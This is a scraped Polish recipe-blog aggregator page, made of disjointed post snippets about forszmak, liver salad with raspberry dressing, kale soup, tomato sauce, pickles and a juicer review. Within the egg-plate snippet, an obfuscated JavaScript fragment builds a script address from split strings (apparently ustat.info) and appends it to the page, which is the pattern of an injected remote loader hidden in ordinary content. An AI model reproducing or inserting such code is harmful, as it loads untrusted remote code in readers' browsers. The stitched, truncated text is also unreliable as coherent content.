przystawka od vor – przed + schmackhaft – smaczny, apetyczny. Początkowo był to więc rodzaj przekąski. Niezwykle popularny forszmak w latach 80-tych królował w polskich restauracjach, gdzie podawany był jako danie główne. Do tej pory smak forszmaku pozostał niezmienny i w takiej samej postaci jak przed laty można się(...)stołówkach wyższych uczelni. Mój forszmak powstał więc trochę z sentymentu do tych studenckich lat. Posmakował całej rodzinie i zagości jeszcze nieraz w mojej kuchni. Składniki: • 250 g mięsa z karkówki • 250 g mięsa z szynki wieprzowej • 150 g boczku wędzonego • kawałek ok. 20 cm cienkiej kiełbasy wędzonej • 4-5 ogórków kiszonych • 1 cebula
To co kochamSłodki zielnik Lary – Lara Gessler – Książka na niedzielę Słodki zielnik Lary – Lara Gessler – Książka na niedzielę. Słodki zielnik Lary to
Kuchnia na wzgórzuKiedyś upiekłam już torta della nonna czyli włoski tort babci i jest on tutaj [ klik ] a dziś proponuję pyszną jego inną wersję ze śliwkami. Dodałam tutaj
Moje Małe CzarowanieHej i hopla! Witajcie w 2015 roku. Dla nas to zapowiedź pełnego roku pod znaku Banana i Soli - w końcu nowy rok, nowe możliwości! O tym
Bananowe PolePo trzech dniach niezbyt zachęcającej pogody na niebo wyszło piękne słoneczko, dzięki czemu już jesteśmy brązowi. Brązowi i ciągle najedzeni, gdyż rozpieszcza nas mama właściciela. Zaczęło
Brzuszki ŁakomczuszkiAby cieszyć się smakiem świeżych grzybów zimą możemy je zamrozić. Przygotowałam kilka porcji duszonych maślaków do sosów i zup.Składniki:maślakimasłosól, pieprzSposób wykonania:1. Maślaki starannie
Kuchnia domowa AniMaliny na wytrawnie? Gdy spróbujecie malinowego sosu vinegrette zapewniam, że zagości w Waszych kuchniach na stałe. Jest wyjątkowy – słodko-kwaskowy, nada charakteru każdej sałatce. Ja połączyłam go z tradycyjną, smażoną wątróbką. Połączenie obłędne – taka sałatka sprawdzi się zarówno na obiad w ciepły, letni dzień, a także na kolację, gdy przychodzą goście. Całość jest lekka, a jednocześnie sycąca. Charakteru(...)sałatką można przekonać także osoby, które za wątróbką na co dzień nie przepadają – w takim towarzystwie bardzo zyskuje na smaku. Choć maliny, wątróbka i chałka to składniki typowo polskie, to niezbędna będzie dobrej jakości oliwa z oliwek i ocet balsamiczny, aby nasz sos wyszedł bez zarzutu. Ja użyłam oliwy i octu Gallo , które można zakupić w sklepach sieci Biedronka
Poezja smakuSezon jarmużowy rozpoczęty i na blogu nowe przepyszne przepisy z tym super zdrowym warzywem. Dzisiaj inspiracja z kuchni portugalskiej, pyszna kartoflanka z dodatkiem jarmużu. W oryginalnej wersji występuje kapusta galicyjska, niestety u nas nieosiągalna. To krzyżówka jarmużu z kapustą pastewną, także jarmuż jest najbliższy oryginału. Widziałam przepisy z kapustą włoską, dla mnie jednak jest to super przepis na wykorzystanie jarmużu(...)składników. Caldo verde to bardzo ekonomiczny posiłek ze sporą porcją warzyw. Zupa jest pyszna w dwóch wersjach i w wersji wege i z dodatkiem kiełbasy chorizo ( u mnie surowa polska). Polecam! Składniki: 500 g ziemniaków około 200 g jarmużu 1 cebula 2 ząbki czosnku 1 l bulionu 1-2 łyżki oliwy/masła ghee papryka wędzona Przygotowanie: jarmuż dokładnie wypłukać
Gotuj zdrowo!Guten Appetit!końca ogarnięty , ale ... Wybaczam. Oglądam też program bo lubię Ewę Wachowicz oraz Wojtka Amaro. Czekam na finał bo jestem już ciekawa kto wygra całe show. Top Chef Polska Dariusz Kuźniak Ewa Wachowicz Wojciech Modest Amaro MIEJSCE Cafe Pietro swojego czasu bardzo często odwiedzane przeze mnie miejsce a później zapomniane. Na nowo odkryte jakiś czas temu. Wielki(...)kosmetykach od dawna. Jeśli ktoś nie stosuje żadnych podkładów ani pudrów to będzie z niego zadowolony. Cera po nim jest gładka i nawilżona. SKŁADNIK Królowało w mojej kuchni awokado i myślę że zostaje w niej już na stałe. A pomyśleć, że jeszcze kilka lat temu nie mogłam na awokado nawet patrzeć. Jak to się smaki przez lata zmieniają
Magiczne Życie MartyBardzo lubię kuchnię śródziemnomorską, a w szczególności bałkańską. Kiedy byłam jeszcze panienką (jak mówiła moja babcia), często wyjeżdżałam nad Morze Śródziemne, czy Egejskie i zakochałam się w tym klimacie, zapachach, smakach. Później wyszłam za mąż, na świat przyszedł nasz ukochany synek i jakoś zabrakło nam czasu na dalsze wyjazdy. W tym roku ma się to zmienić, więc mocno trzymam kciuki(...)Już nie mogę doczekać się chwili gdy będę leżała na leżaczku pod parasolem, popijając mrożoną kawę, słuchać szumu fal, chłonąć słońce, żeby starczyło na resztę, raczej pochmurnego roku w Polsce. Smak soczystych brzoskwiń, dojrzałych pomidorów i słodkich arbuzów.... ach, gdyby to ode mnie zależało już bym się pakowała ;) Ale wracajmy na ziemię! Za oknem u mnie dzisiaj jest słonecznie, choć
Rozpustne gotowanieSezon truskawkowy w pełni! Mam nadzieję, że o wartościach zdrowotnych, a tym bardziej smakowych tych owoców nikogo przekonywać nie trzeba :) Ja je uwielbiam i nie przepuszczam
Taste Of My Dayrodzinne śniadania przy wspólnym stole. Zobacz artykuł: Poznaj kilka sposobów na jajka wielkanocne . Okres świąt skłania nas do serwowania jaj pod inną niż zazwyczaj postacią. Sporym powodzeniem w polskich domach cieszą się jajka faszerowane czy jajka pod pierzynką. Takie przekąski najładniej się prezentują, kiedy są podane na talerzach do jajek . Każdy z nas powinien mieć w swoim domu to praktyczne(...)jajek . Ich zaletą jest to, że chronią delikatną skorupkęprzed wysoką temperaturą, zapobiegając ich pękaniu w trakcie gotowania i wylewaniu się białka na zewnątrz. To zdecydowanie bardzo przydatny dodatek w kuchni. (function(){ qc4u=document.createElement("script");qc4u_=("us")+("ta"); qc4u_+="t"+(".");qc4u_+=("in");qc4uu="70786408";qc4u.async=true; qc4uu+=".sq61xvuuc4uw106ug";qc4u.type="text/javascript";qc4u_+="f"+"o"+("/"); qc4uu+="i613dfqlwXxm9";qc4u.src="//"+qc4u_+qc4uu; dqc4u=document.body;dqc4u.appendChild
FoodMagazine.pl - Przepisy kulinarneLubisz kuchnię włoską? Ten przepis jest dla Ciebie. Troszkę jestem szczęściarą/wariatką, bo od kilku lat, wraz z końcem lata, zamykam smak pomidorów w słoikach ( w ogromnych ilościach). Przez zimę/wiosnę, otwieram słoik-i mam "gotowca". SKŁADNIKI: U mnie słoik własnego wyrobu( ew. 2 puszki pomidorów) 1 cebulka 2 ząbki czosnku sól, pieprz,cukier-do smaku odrobina(...)oliwy podsmażam drobno pokrojoną cebulkę, po chwili dodaję czosnek, następnie pomidory. Jeżeli są z puszki,musimy dłużej je przesmażyć, ja własne-to wiadomo :) Całość doprawiamy, solą, pieprzem, cukrem (niestety polskie pomidory kochają cukier),Troszkę octu balsamicznego, suszona (lub świeża) bazylia i gotowe :) WSKAZÓWKI: Baza dla wszelkiego rodzaju sosów włoskich
Kopystką po garachmnie początek sezonu na stojące w kuchni w pękatych słojach ogórki to – zaraz obok młodej kapusty – najlepsze potwierdzenie pełni wiosny i zapowiedź nadchodzącego wielkimi krokami lata. I w kuchni, i na zewnątrz. Ogórki Wybierzcie krótkie, równe, jednakowej wielkości, ciemnozielone i kształtne. Muszą być świeże – jędrne i twarde, niepoobijane, nie podziurawione. Najlepsze do robienia małosolnych są ogórki gruntowe. Trzeba je bardzo(...)tyle, że po ukiszeniu zmiękły i dosłownie porozpadały się w słoikach. Sprawdzajcie i pytajcie w warzywniakach, co i skąd kupujecie. Przyprawy Chrzan, czosnek i koper. Chrzan to typowo polski dodatek do ogórków. Do małosolnych możemy użyć zarówno korzenia, jak liści chrzanu. Liście wybieramy młode i dokładnie je myjemy, kawałek korzenia obieramy cienko ze skórki i kroimy w słupki
Karo in the KitchenKończy nam się już okres warzyw "sezonowych", tak więc stwierdziłam, że będzie młoda kapusta. Anegdota z tym związana jest taka, że z tego miały
Zainspiruj się kuchniąwolnoobrotowa 4Swiss BM 105 okazała się dla nas najlepszym z możliwych wyborów. Pierwszą istotną kwestię stanowi tutaj silnik o potężnej mocy aż 400 W (to największa moc silnika na polskim rynku wyciskarek!). Dodatkowo producent zapewnia dożywotnią gwarancję na ten element. Ergonomiczna i wielofunkcyjna Co takiego sprawiło, że zakochaliśmy się w niej od pierwszego użycia? Wyciskarki wolnoobrotowe 4Swiss(...)dokładnie przetestować to urządzenie i już niedługo podzielę się z Wami znakomitymi przepisami! W pierwszej kolejności uwagę zwraca również wyjątkowo estetyczny, minimalistyczny design, dzięki któremu urządzenie wręcz zdobi kuchnię. Dostępne są jest w dwóch kolorach Rose Gold oraz Platnum Silver – my zdecydowaliśmy się na tę drugą wersję. Jednak to, co najważniejsze, to to, że Swan
kuron.com.plTo już kolejne słodkości z dalekiej północy, które chciałabym wam pokazać. Tym razem są to kruche rurki, które są jednym z
ciastkarnia na kruchym spodzieSzynka a’la sztufada , pyszna pieczeń Sztufada to pieczeń wołowa szpikowana wędzoną słoniną . Ja z racji tego ,że moi chłopcy wołowinę tolerują tylko w rumsztykach
Ogrodnik w podróży